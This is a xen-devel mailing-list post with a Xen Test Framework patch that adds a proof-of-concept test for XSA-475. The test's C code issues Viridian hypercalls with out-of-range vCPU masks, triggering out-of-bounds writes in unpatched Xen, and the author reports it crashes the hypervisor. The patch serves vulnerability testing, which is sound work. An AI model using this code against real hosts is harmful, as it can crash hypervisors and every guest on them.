[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[XTF PATCH] XSA-475 PoC: Viridian Out-of-bounds


  • To: xen-devel@xxxxxxxxxxxxxxxxxxxx
  • From: Teddy Astie <teddy.astie@xxxxxxxxxx>
  • Date: Wed, 8 Jul 2026 19:22:28 +0200
  • Authentication-results: eu.smtp.expurgate.cloud; dkim=pass header.s=selector1 header.d=vates.tech header.i="@vates.tech" header.h="From:Subject:Date:Message-ID:To:Cc:MIME-Version:Content-Type:Feedback-ID"
  • Cc: Teddy Astie <teddy.astie@xxxxxxxxxx>, Andrew Cooper <andrew.cooper3@xxxxxxxxxx>
  • Delivery-date: Wed, 08 Jul 2026 17:23:23 +0000
  • Feedback-id: default:8631fc262581453bbf619ec5b2062170:Sweego
  • List-id: Xen developer discussion <xen-devel.lists.xenproject.org>

Signed-off-by: Teddy Astie <teddy.astie@xxxxxxxxxx>
---
CC: Andrew Cooper <andrew.cooper3@xxxxxxxxxx>

Tested (crashing Xen) on a Xen build with reverted patch (tested both CVEs).

 docs/all-tests.dox         |   1 +
 tests/xsa-475/Makefile     |  11 ++++
 tests/xsa-475/extra.cfg.in |   1 +
 tests/xsa-475/main.c       | 124 +++++++++++++++++++++++++++++++++++++
 4 files changed, 137 insertions(+)
 create mode 100644 tests/xsa-475/Makefile
 create mode 100644 tests/xsa-475/extra.cfg.in
 create mode 100644 tests/xsa-475/main.c

diff --git a/docs/all-tests.dox b/docs/all-tests.dox
index ff38747..441eaf7 100644
--- a/docs/all-tests.dox
+++ b/docs/all-tests.dox
@@ -185,6 +185,7 @@ states.
 
 @subpage test-xsa-472-3 - Viridian reference TSC page leak.
 
+@subpage test-xsa-475 - x86: Incorrect input sanitisation in Viridian 
hypercalls
 
 @section index-utility Utilities
 
diff --git a/tests/xsa-475/Makefile b/tests/xsa-475/Makefile
new file mode 100644
index 0000000..31bdb84
--- /dev/null
+++ b/tests/xsa-475/Makefile
@@ -0,0 +1,11 @@
+include $(ROOT)/build/common.mk
+
+NAME      := xsa-475
+CATEGORY  := xsa
+TEST-ENVS := hvm64
+
+TEST-EXTRA-CFG := extra.cfg.in
+
+obj-perenv += main.o
+
+include $(ROOT)/build/gen.mk
diff --git a/tests/xsa-475/extra.cfg.in b/tests/xsa-475/extra.cfg.in
new file mode 100644
index 0000000..7ca5a28
--- /dev/null
+++ b/tests/xsa-475/extra.cfg.in
@@ -0,0 +1 @@
+viridian = [ "base" ]
\ No newline at end of file
diff --git a/tests/xsa-475/main.c b/tests/xsa-475/main.c
new file mode 100644
index 0000000..cfdacab
--- /dev/null
+++ b/tests/xsa-475/main.c
@@ -0,0 +1,124 @@
+/**
+ * @file tests/xsa-475/main.c
+ * @ref test-xsa-475
+ *
+ * @page test-xsa-475 XSA-475
+ *
+ * Advisory: [XSA-475](https://xenbits.xen.org/xsa/advisory-475.html)
+ *
+ * Some bounds check were missing in viridian hypercalls, causing out of bound
+ * writes (CVE-2025-58147) or operating on a wild pointer (CVE-2025-58148).
+ * We can trigger it by targetting vCPUs ID that are over HVM_MAX_VCPUS.
+ *
+ * @see tests/xsa-475/main.c
+ */
+
+#include <xtf.h>
+
+const char test_title[] = "XSA-475";
+
+#define HVCALL_SEND_IPI 0x000b
+
+#define HVCALL_FLUSH_VIRTUAL_ADDRESS_SPACE_EX  0x0013
+#define HVCALL_FLUSH_VIRTUAL_ADDRESS_LIST_EX   0x0014
+#define HVCALL_SEND_IPI_EX                     0x0015
+
+enum HV_GENERIC_SET_FORMAT {
+    HV_GENERIC_SET_SPARSE_4K,
+    HV_GENERIC_SET_ALL,
+};
+
+struct hv_vpset {
+    uint64_t format;
+    uint64_t valid_bank_mask;
+    uint64_t bank_contents[64];
+};
+
+static void test_send_ipi(uint64_t vcpu_mask)
+{
+    struct {
+        uint32_t vector;
+        uint8_t target_vtl;
+        uint8_t reserved_zero[3];
+        uint64_t vcpu_mask;
+    } input_params = { 0 };
+
+    input_params.vector = 0xD0;
+    input_params.vcpu_mask = vcpu_mask & ~1; /* Don't self-ipi */
+
+    if (vendor_is_intel)
+        asm volatile ("vmcall" :: "a"(0x80000000U), "c"(HVCALL_SEND_IPI),
+                                  "d"(&input_params) : "memory");
+    else if (vendor_is_amd)
+        asm volatile ("vmmcall" :: "a"(0x80000000U), "c"(HVCALL_SEND_IPI),
+                                   "d"(&input_params) : "memory");
+}
+
+static void test_send_ipi_ex(struct hv_vpset set)
+{
+    int ret = 0;
+    struct {
+        uint64_t address_space;
+        uint64_t flags;
+        struct hv_vpset set;
+    } input_params;
+
+    input_params.address_space = 0;
+    input_params.flags = 0;
+    input_params.set = set;
+
+    if (vendor_is_intel)
+        asm volatile ("vmcall" : "=a"(ret) : "a"(0x80000000U),
+                                 "c"(HVCALL_SEND_IPI_EX),
+                                 "d"(&input_params) : "memory");
+    else if (vendor_is_amd)
+        asm volatile ("vmmcall" : "=a"(ret) : "a"(0x80000000U),
+                                  "c"(HVCALL_SEND_IPI_EX),
+                                  "d"(&input_params) : "memory");
+}
+
+static void test_flush_vaddr_ex(struct hv_vpset set)
+{
+    int ret = 0;
+    struct {
+        uint64_t address_space;
+        uint64_t flags;
+        struct hv_vpset set;
+    } input_params;
+
+    input_params.address_space = 0;
+    input_params.flags = 0;
+    input_params.set = set;
+
+    if (vendor_is_intel)
+        asm volatile ("vmcall" : "=a"(ret) : "a"(0x80000000U),
+                                 "c"(HVCALL_FLUSH_VIRTUAL_ADDRESS_SPACE_EX),
+                                 "d"(&input_params) : "memory");
+    else if (vendor_is_amd)
+        asm volatile ("vmmcall" : "=a"(ret) : "a"(0x80000000U),
+                                  "c"(HVCALL_FLUSH_VIRTUAL_ADDRESS_SPACE_EX),
+                                  "d"(&input_params) : "memory");
+    }
+
+void test_main(void)
+{
+    struct hv_vpset set;
+    set.format = HV_GENERIC_SET_SPARSE_4K;
+
+    printk("Test HVCALL_SEND_IPI to 64 first CPUs (non-existent)\n");
+    test_send_ipi(~0);
+
+    printk("Test HVCALL_FLUSH_VIRTUAL_ADDRESS_SPACE_EX with all banks set\n");
+    set.valid_bank_mask = ~0;
+    memset(set.bank_contents, 1, sizeof(set.bank_contents));
+    test_flush_vaddr_ex(set);
+
+    printk("Test HVCALL_FLUSH_VIRTUAL_ADDRESS_SPACE_EX with all banks set 
(skipping self)\n");
+    set.valid_bank_mask = ~0;
+    memset(set.bank_contents, 1, sizeof(set.bank_contents));
+    set.bank_contents[0] &= 1; /* don't self-ipi */
+    test_send_ipi_ex(set);
+
+    xtf_success("Success: Probably not vulnerable to XSA-475\n");
+}
+
-- 
2.54.0



--
Teddy Astie | Vates XCP-ng Developer

XCP-ng & Xen Orchestra - Vates solutions

web: https://vates.tech

 


Rackspace

Lists.xenproject.org is hosted with RackSpace, monitoring our
servers 24x7x365 and backed by RackSpace's Fanatical Support®.